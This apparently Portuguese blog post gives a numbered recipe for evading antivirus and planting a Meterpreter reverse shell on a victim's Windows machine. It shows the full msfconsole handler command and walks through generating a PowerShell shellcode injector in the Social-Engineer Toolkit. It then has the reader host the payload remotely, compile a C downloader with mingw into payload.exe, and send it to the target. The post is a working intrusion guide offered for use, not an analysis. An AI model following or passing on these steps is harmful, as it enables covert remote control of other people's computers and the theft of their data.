BYPASSAV – SETOOLKIT POWERSHELL ALPHANUMERIC SHELLCODE INJECTOR

1 – Inicie noip
2 – Inicie Postgresql
3 – Check seu Ip em: http://whatismyipaddress.com/
4 – Inicie Msfconsole com suas configuraçoes:
Ex: msfconsole -x “use exploit/multi/handler;set payload windows/meterpreter/reverse_tcp;set LPORT 7000;set LHOST 192.168.1.3;set ExitOnSession false; exploit -j” -q
5 – Inicie o Setoolkit

  • set opção 1 – Social-Engineering Attacks
  • set opção 9 – Powershell Attack Vectors
  • set opção 1 – Powershell Alphanumeric Shellcode Injector
  • set seu IP
  • set sua Porta
  • set opção no – [yes/no]

6 – Entre na pasta /root/.set/reports/powershell
7 – Mova x86_powershell_injection.txt para area de trabalho
8 – Faça Upload de  x86_powershell_injection.txt para um servidor remoto ou web
9 – Copie o codigo(Executable_C_Code) do github para seu computador
code: https://github.com/msOlivers/PacketofScripts/tree/master/ExecutableCCode – edit a sua url e salve  o arquivo
10 – Instale mingw32 no seu linux: Comando

  • i586-mingw32msvc-gcc ExecutableCCode.c -o saida.exe -lws2_32

11 – Compile seu codigo: Comando

  • i586-mingw32msvc-gcc temp.c -o payload.exe -lws2_32

12 – Envie seu executavel para o  trageto e use com moderação

By  Moisés Oliver

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s